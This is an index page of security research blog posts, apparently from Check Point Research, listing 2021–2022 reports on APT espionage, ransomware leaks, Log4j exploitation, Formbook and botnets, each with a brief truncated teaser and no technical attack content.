Twisted Panda: Chinese APT espionage operation against Russian’s state-owned defense institutes

May 19, 2022 1:22 pm

Introduction In the past two months, we observed multiple APT groups attempting to leverage the Russia and Ukraine war as a lure for espionage operations. It comes as no surprise that Russian entities... Click to Read More

State-sponsored Attack Groups Capitalise on Russia-Ukraine War for Cyber Espionage

March 31, 2022 12:58 pm

Introduction Geopolitical tensions often make headlines and present a golden opportunity for threat actors to exploit the situation, especially those targeting high-profile victims. In the past month while the Russian invasion of Ukraine... Click to Read More

AirDrop process of ApeCoin cryptocurrency found vulnerable, led to theft of millions of dollars in NFTs

March 19, 2022 2:10 pm

Research by : Dikla Barda, Roman Zaikin, Oded Vanunu Highlights: ApeCoin, one of the largest NTF’s today announced free token claim on launch Hackers found a way to claim free tokens on ApeCoin... Click to Read More

Leaks of Conti Ransomware Group Paint Picture of a Surprisingly Normal Tech Start-Up… Sort Of

March 10, 2022 10:04 pm

Introduction You’ve probably heard of the Conti ransomware group. After their 2020 emergence, they’ve accumulated at least 700 victims, where by “victims” we mean ‘big fish’ corporations with millions of dollars in revenue;... Click to Read More

EvilPlayout: Attack Against Iran’s State Broadcaster

February 18, 2022 1:09 pm

In the past few months, a new wave of cyberattacks has been flooding Iran. These attacks are far from minor website defacements – the recent wave is hitting national infrastructure and causing major... Click to Read More

APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit

January 11, 2022 2:09 pm

Introduction With the emergence of the Log4j security vulnerability, we’ve already seen multiple threat actors, mostly financially motivated, immediately add it to their exploitation arsenal. It comes as no surprise that some nation-sponsored... Click to Read More

A Deep Dive into DoubleFeature, Equation Group’s Post-Exploitation Dashboard

December 27, 2021 2:30 pm

Earlier this year, Check Point Research published the story of “Jian” — an exploit used by Chinese threat actor APT31 which was “heavily inspired by” an almost-identical exploit used by the Equation Group,... Click to Read More

Phorpiex botnet is back with a new Twizt: Hijacking Hundreds of crypto transactions

December 16, 2021 1:58 pm

Research by: Alexey Bukhteyev Check Point Research (CPR) spotted the resurgence of Phorpiex, an old threat known for its sextortion spam campaigns, crypto-jacking, cryptocurrency clipping and ransomware spread The new variant “Twizt” enables... Click to Read More

The Laconic Log4Shell FAQ

December 14, 2021 7:00 pm

What is Log4Shell (CVE-2021-44228)? A Remote Code Execution vulnerability in log4j2, a popular logging framework used in Java applications. What does this mean in practice? It means you can compromise a machine by... Click to Read More

When old friends meet again: why Emotet chose Trickbot for rebirth

December 8, 2021 1:58 pm

Research by: Raman Ladutska, Aliaksandr Trafimchuk, David Driker, Yali Magiel Overview Trickbot and Emotet are considered some of the largest botnets in history. They both share a similar story: they were taken down... Click to Read More

Smishing Botnets Going Viral in Iran

December 1, 2021 2:33 pm

Research by: Shmuel Cohen Introduction In the last few months, multiple Iranian media and social networks have published warnings about ongoing SMS phishing campaigns impersonating Iranian government services. The story is as old... Click to Read More

Indra — Hackers Behind Recent Attacks on Iran

August 14, 2021 11:00 am

Check Point Research reveals that a threat actor named Indra is responsible for the attacks against targets in Iran, as well as against companies in Syria.

Stealth is never enough, or Revealing Formbook successor’s C&C infrastructure

August 2, 2021 5:25 pm

By: Alexey Bukhteyev & Raman Ladutska Reliability is one of the main requirements for software, and malware is no exception. If a malware product is reliable enough to exfiltrate the data from the... Click to Read More

Time-proven tricks in a new environment: the macOS evolution of Formbook

July 27, 2021 11:15 pm

By: Alexey Bukhteyev & Raman Ladutska The vast majority of threats for macOS are Adware such as Shlayer, Bundlore, Pirrit, and others. Compared to Windows, we only rarely encounter really harmful macOS malware... Click to Read More

Top prevalent malware with a thousand campaigns migrates to macOS

July 21, 2021 12:57 pm

By: Alexey Bukhteyev and Raman Ladutska From a simple keylogger to a top prevalent malware Formbook is currently one of the most prevalent malware. It has been active for more than 5 years... Click to Read More